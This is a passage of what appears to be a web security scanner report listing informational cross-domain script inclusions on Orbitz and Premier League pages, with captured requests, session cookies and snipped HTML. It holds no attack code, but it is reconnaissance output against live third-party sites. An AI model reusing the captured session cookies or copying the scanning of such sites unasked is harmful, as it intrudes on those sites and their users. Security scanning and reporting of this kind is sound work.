t=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=65&width=149&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&channel=air&Section=results&adsize=149x65&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=65&width=149&"></script>
...[SNIP]...
<div class="ad" id="adhotwireBottom">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=results&adsize=hotwireBottom&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=175&width=125&adType=noframe&"></script>
...[SNIP]...
<div class="ad" id="ad160x600">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=results&adsize=160x600&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=600&width=120&adType=noframe&"></script>
...[SNIP]...
<div class="ad" id="ad160x600_right">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=results&adsize=160x600_right&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=600&width=160&adType=noframe&"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://www.google.com/afsonline/show_afs_ads.js"></script>
...[SNIP]...
<div class="thirdPartyLogos">
            <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=120x55_footer&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&height=55&width=120&"></script>
...[SNIP]...
&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=1&width=1&pos=top&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&channel=air&Section=results&adsize=1x1&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=1&width=1&pos=top&"></script>
...[SNIP]...
te=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=1&width=1&adType=iframe&pos=middle&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&channel=air&Section=results&adsize=1x1&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=1&width=1&adType=iframe&pos=middle&"></script>
...[SNIP]...

20.92. http://www.orbitz.com/shop/hotelsearch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shop/hotelsearch

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=orbitz&grp=9705&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B141652382%3B20702477%3Ba%3Fhttp%3A%2F%2Fwww.orbitz.com%2Fpsi%3Ftype%3Dhotel%26market%3D%24%7Bcity%7D%2C%24%7Bcountryn%7D%26checkin%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm-dd%22%7D%26checkout%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm-dd%22%7D%26guests%3D%24%7Badults%7D%26rooms%3D%24%7Brooms%7D%26WT.mc_id%3Do_igo_merch_city_dated%26WT.mc_ev%3Dclick%26gcid%3DC11287x600-CY%24%7Bcity%7D%2C%24%7Bcountryn%7D&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=153&pos=0&aii=e3898191-1452-431e-82b6-c9f881ca9a4c&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317596806325:ss=1317596806325; mbox=check#true#1317600467|session#1317600406536-142286#1317602267; adRotator=true; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: curr=USD; Expires=Sat, 21-Oct-2079 03:24:10 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Set-Cookie: MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDA2MDM3OTd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToxMDowMyBQTXwgfCA="; Version=1; Domain=orbitz.com; Max-Age=2592000; Expires=Wed, 02-Nov-2011 00:10:03 GMT; Path=/
Set-Cookie: dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; Expires=Fri, 02-Dec-2011 00:10:04 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:10:04 GMT
Content-Length: 249175


...[SNIP]...
<!-- BEGIN LivePerson Monitor. -->
       <script type="text/javascript" src="http://www.tnetnoc.com/static/28.12.12/script/jsAllTealeaf.js"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard top1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&amp;pos=top1&amp;Section=results&amp;channel=hotel&amp;tile=1317600604712&amp;refUrl=http%3A%2F%2Fwww.orbitz.com%2F&amp;spu=true&amp;location=US&amp;secure=false&amp;state=MA&amp;searchType=hotel&amp;CookieName=PRO2&amp;currency=USD&amp;aboveThreshold=true&amp;city=BOSTON&amp;passengers=a&amp;preTeen=0&amp;search=Search&amp;mkid=11231&amp;hotelSearchType=keyword&amp;infants=0&amp;site=orbitz&amp;platform=austin&amp;gradeSchoolers=0&amp;numberOfAdultsRoom0=1&amp;hotelCheckOutDate=10%2F7%2F11&amp;productPath=HOTEL&amp;numberOfRooms=1&amp;hotelCheckInDate=10%2F4%2F11&amp;preSchoolers=0&amp;m=0&amp;toddlers=0&amp;country=US&amp;v=50.23.123.106-1472814720.30179680&amp;dest=BOSTON&amp;numberOfChildren=0&amp;teenagers=0&amp;subdomain=orbitz&amp;language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&amp;pos=bottom1&amp;Section=results&amp;channel=hotel&amp;tile=1317600604712&amp;refUrl=http%3A%2F%2Fwww.orbitz.com%2F&amp;spu=true&amp;location=US&amp;secure=false&amp;state=MA&amp;searchType=hotel&amp;CookieName=PRO2&amp;currency=USD&amp;aboveThreshold=true&amp;city=BOSTON&amp;passengers=a&amp;preTeen=0&amp;search=Search&amp;mkid=11231&amp;hotelSearchType=keyword&amp;infants=0&amp;site=orbitz&amp;platform=austin&amp;gradeSchoolers=0&amp;numberOfAdultsRoom0=1&amp;hotelCheckOutDate=10%2F7%2F11&amp;productPath=HOTEL&amp;numberOfRooms=1&amp;hotelCheckInDate=10%2F4%2F11&amp;preSchoolers=0&amp;m=0&amp;toddlers=0&amp;country=US&amp;v=50.23.123.106-1472814720.30179680&amp;dest=BOSTON&amp;numberOfChildren=0&amp;teenagers=0&amp;subdomain=orbitz&amp;language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom2" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&amp;pos=bottom2&amp;Section=results&amp;channel=hotel&amp;tile=1317600604712&amp;refUrl=http%3A%2F%2Fwww.orbitz.com%2F&amp;spu=true&amp;location=US&amp;secure=false&amp;state=MA&amp;searchType=hotel&amp;CookieName=PRO2&amp;currency=USD&amp;aboveThreshold=true&amp;city=BOSTON&amp;passengers=a&amp;preTeen=0&amp;search=Search&amp;mkid=11231&amp;hotelSearchType=keyword&amp;infants=0&amp;site=orbitz&amp;platform=austin&amp;gradeSchoolers=0&amp;numberOfAdultsRoom0=1&amp;hotelCheckOutDate=10%2F7%2F11&amp;productPath=HOTEL&amp;numberOfRooms=1&amp;hotelCheckInDate=10%2F4%2F11&amp;preSchoolers=0&amp;m=0&amp;toddlers=0&amp;country=US&amp;v=50.23.123.106-1472814720.30179680&amp;dest=BOSTON&amp;numberOfChildren=0&amp;teenagers=0&amp;subdomain=orbitz&amp;language=en_US"></script>
...[SNIP]...

20.93. http://www.orbitz.com/shop/hotelsearch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shop/hotelsearch

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /shop/hotelsearch?type=hotel&hotel.keyword.key=bos&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/09/11&hotel.chkout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; PackagingContext=APH; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/11/11|||||||||10/24/11|10/24/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; OrbitzRegistration="N,2,0,0"; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598618455:ss=1317596806325; mbox=session#1317600406536-142286#1317604079|PC#1317600406536-142286.19#1320194219|check#true#1317602279; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|egapp2192p.prod.orbitz.net; Domain=.orbitz.com; Path=/
Set-Cookie: curr=USD; Expires=Sat, 21-Oct-2079 03:52:52 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Set-Cookie: MKTG=ABCDEFGHU0VNfEMxMTI4N3g3MTl8IHwxMzE3NjAyMzI1NDY3fEMxMTI4N3g3MTl8fDEwLzAyLzIwMTEgMTk6Mzg6NDUgUE18IHwg; Domain=orbitz.com; Expires=Wed, 02-Nov-2011 00:38:45 GMT; Path=/
Set-Cookie: dpc=HOTEL%7C2.2%7C%7Cbos%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-09%7C2011-10-16%7C%7C+%7C%26%26HE; Expires=Fri, 02-Dec-2011 00:38:45 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:38:45 GMT
Content-Length: 243900


...[SNIP]...
<!-- BEGIN LivePerson Monitor. -->
       <script type="text/javascript" src="http://www.tnetnoc.com/static/28.12.12/script/jsAllTealeaf.js"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard top1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&amp;pos=top1&amp;Section=results&amp;channel=hotel&amp;tile=1317602326150&amp;refUrl=http%3A%2F%2Fwww.orbitz.com%2F&amp;spu=true&amp;location=US&amp;secure=false&amp;state=MA&amp;searchType=hotel&amp;CookieName=PRO2&amp;currency=USD&amp;aboveThreshold=true&amp;city=BOSTON&amp;passengers=a&amp;preTeen=0&amp;search=Search&amp;mkid=36053&amp;hotelSearchType=keyword&amp;infants=0&amp;site=orbitz&amp;platform=austin&amp;gradeSchoolers=0&amp;numberOfAdultsRoom0=1&amp;hotelCheckOutDate=10%2F16%2F11&amp;productPath=HOTEL&amp;numberOfRooms=1&amp;hotelCheckInDate=10%2F9%2F11&amp;preSchoolers=0&amp;m=0&amp;toddlers=0&amp;country=US&amp;v=50.23.123.106-1472814720.30179680&amp;dest=LOGAN_INT%27L_AIRPORT&amp;numberOfChildren=0&amp;teenagers=0&amp;subdomain=orbitz&amp;language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&amp;pos=bottom1&amp;Section=results&amp;channel=hotel&amp;tile=1317602326150&amp;refUrl=http%3A%2F%2Fwww.orbitz.com%2F&amp;spu=true&amp;location=US&amp;secure=false&amp;state=MA&amp;searchType=hotel&amp;CookieName=PRO2&amp;currency=USD&amp;aboveThreshold=true&amp;city=BOSTON&amp;passengers=a&amp;preTeen=0&amp;search=Search&amp;mkid=36053&amp;hotelSearchType=keyword&amp;infants=0&amp;site=orbitz&amp;platform=austin&amp;gradeSchoolers=0&amp;numberOfAdultsRoom0=1&amp;hotelCheckOutDate=10%2F16%2F11&amp;productPath=HOTEL&amp;numberOfRooms=1&amp;hotelCheckInDate=10%2F9%2F11&amp;preSchoolers=0&amp;m=0&amp;toddlers=0&amp;country=US&amp;v=50.23.123.106-1472814720.30179680&amp;dest=LOGAN_INT%27L_AIRPORT&amp;numberOfChildren=0&amp;teenagers=0&amp;subdomain=orbitz&amp;language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom2" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&amp;pos=bottom2&amp;Section=results&amp;channel=hotel&amp;tile=1317602326150&amp;refUrl=http%3A%2F%2Fwww.orbitz.com%2F&amp;spu=true&amp;location=US&amp;secure=false&amp;state=MA&amp;searchType=hotel&amp;CookieName=PRO2&amp;currency=USD&amp;aboveThreshold=true&amp;city=BOSTON&amp;passengers=a&amp;preTeen=0&amp;search=Search&amp;mkid=36053&amp;hotelSearchType=keyword&amp;infants=0&amp;site=orbitz&amp;platform=austin&amp;gradeSchoolers=0&amp;numberOfAdultsRoom0=1&amp;hotelCheckOutDate=10%2F16%2F11&amp;productPath=HOTEL&amp;numberOfRooms=1&amp;hotelCheckInDate=10%2F9%2F11&amp;preSchoolers=0&amp;m=0&amp;toddlers=0&amp;country=US&amp;v=50.23.123.106-1472814720.30179680&amp;dest=LOGAN_INT%27L_AIRPORT&amp;numberOfChildren=0&amp;teenagers=0&amp;subdomain=orbitz&amp;language=en_US"></script>
...[SNIP]...

20.94. http://www.premierleague.com/page/Headlines/0,,12306~2466648,00.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.premierleague.com
Path:   /page/Headlines/0,,12306~2466648,00.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /page/Headlines/0,,12306~2466648,00.html HTTP/1.1
Host: www.premierleague.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.premierleague.com/page/SearchResults/?searchQuery=soccor+football+goal+tv+xss&page=2229476&page=2231401&page=2232085&page=2232088&page=2232090&page=2233530&order=date
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tabPreferences15685=0; tabPreferences4361=0; tabPreferences4381=0; tabPreferences4401=0; tabPreferences5102=0; __utma=233090271.104762655.1317599330.1317599330.1317599330.1; __utmb=233090271.4.10.1317599330; __utmc=233090271; __utmz=233090271.1317599330.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; rsi_segs=; s_sq=premiumtvpremierleague%3D%2526pid%253D/SearchResults%2526pidt%253D1%2526oid%253Dhttp%25253A//www.premierleague.com/page/Headlines/0%25252C%25252C12306%25257E2466648%25252C00.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Sun, 02 Oct 2011 23:51:22 GMT
Content-Type: text/html
Expires: Sun, 02 Oct 2011 23:58:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:58:01 GMT
Content-Length: 67785
Connection: close
Vary: Accept-Encoding


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- Rendered: perslows02 at 03 10 2011 00:51:22 BST -->
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ut
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<!-- START REVENUE SCIENCE PIXELLING CODE -->
<script src="http://js.revsci.net/gateway/gw.js?csid=G07611"></script>
...[SNIP]...

20.95. http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.premierleague.com
Path:   /page/Headlines/0,,12306~2469333,00.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /page/Headlines/0,,12306~2469333,00.html HTTP/1.1
Host: www.premierleague.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=233090271.104762655.1317599330.1317599330.1317599330.1; __utmb=233090271.1.10.1317599330; __utmc=233090271; __utmz=233090271.1317599330.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tabPreferences15685=0; tabPreferences4361=0; tabPreferences4381=0; tabPreferences4401=0

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Sun, 02 Oct 2011 23:42:52 GMT
Content-Type: text/html
Expires: Sun, 02 Oct 2011 23:49:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:49:08 GMT
Content-Length: 65408
Connection: close
Vary: Accept-Encoding


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- Rendered: perslows04 at 03 10 2011 00:42:52 BST -->
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ut
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<!-- START REVENUE SCIENCE PIXELLING CODE -->
<script src="http://js.revsci.net/gateway/gw.js?csid=G07611"></script>
...[SNIP]...

20.96. http://www.premierleague.com/page/Home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.premierleague.com
Path:   /page/Home

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /page/Home HTTP/1.1
Host: www.premierleague.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2466648,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tabPreferences15685=0; tabPreferences4361=0; tabPreferences4381=0; tabPreferences4401=0; tabPreferences5102=0; s_cc=true; rsi_segs=; s_sq=premiumtvpremierleague%3D%2526pid%253D/SearchResults%2526pidt%253D1%2526oid%253Dhttp%25253A//www.premierleague.com/page/Headlines/0%25252C%25252C12306%25257E2466648%25252C00.html%2526ot%253DA; __utma=233090271.104762655.1317599330.1317599330.1317599330.1; __utmb=233090271.5.10.1317599330; __utmc=233090271; __utmz=233090271.1317599330.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Sun, 02 Oct 2011 23:49:30 GMT
Content-Type: text/html
Expires: Sun, 02 Oct 2011 23:58:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:58:09 GMT
Content-Length: 178226
Connection: close
Vary: Accept-Encoding


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- Rendered: perslows02 at 03 10 2011 00:49:30 BST -->
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ut
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<div class="HTMLElement">
<script type="text/javascript" src="http://www.premierleague.premiumtv.co.uk/staticFiles/f6/9b/0,,~39926,00.js"></script>
...[SNIP]...
<!-- START REVENUE SCIENCE PIXELLING CODE -->
<script src="http://js.revsci.net/gateway/gw.js?csid=G07611"></script>
...[SNIP]...

20.97. http://www.premierleague.com/page/Home/0,,12306,00.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.premierleague.com
Path:   /page/Home/0,,12306,00.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /page/Home/0,,12306,00.html HTTP/1.1
Host: www.premierleague.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Sun, 02 Oct 2011 23:39:49 GMT
Content-Type: text/html
Content-Length: 178226
Vary: Accept-Encoding
Cache-Control: max-age=10
Date: Sun, 02 Oct 2011 23:48:52 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- Rendered: perslows03 at 03 10 2011 00:39:48 BST -->
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ut
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<div class="HTMLElement">
<script type="text/javascript" src="http://www.premierleague.premiumtv.co.uk/staticFiles/f6/9b/0,,~39926,00.js"></script>
...[SNIP]...
<!-- START REVENUE SCIENCE PIXELLING CODE -->
<script src="http://js.revsci.net/gateway/gw.js?csid=G07611"></script>
...[SNIP]...

20.98. http://www.premierleague.com/page/Players/0,,12306,00.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.premierleague.com
Path:   /page/Players/0,,12306,00.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /page/Players/0,,12306,00.html HTTP/1.1
Host: www.premierleague.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tabPreferences15685=0; tabPreferences4361=0; tabPreferences4381=0; tabPreferences4401=0; __utma=233090271.104762655.1317599330.1317599330.1317599330.1; __utmb=233090271.2.10.1317599330; __utmc=233090271; __utmz=233090271.1317599330.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; rsi_segs=; s_sq=premiumtvpremierleague%3D%2526pid%253D/Headlines%2526pidt%253D1%2526oid%253Dhttp%25253A//www.premierleague.com/page/Players/0%25252C%25252C12306%25252C00.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Mon, 03 Oct 2011 00:18:37 GMT
Content-Type: text/html
Expires: Sun, 02 Oct 2011 23:50:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:50:23 GMT
Content-Length: 81832
Connection: close
Vary: Accept-Encoding


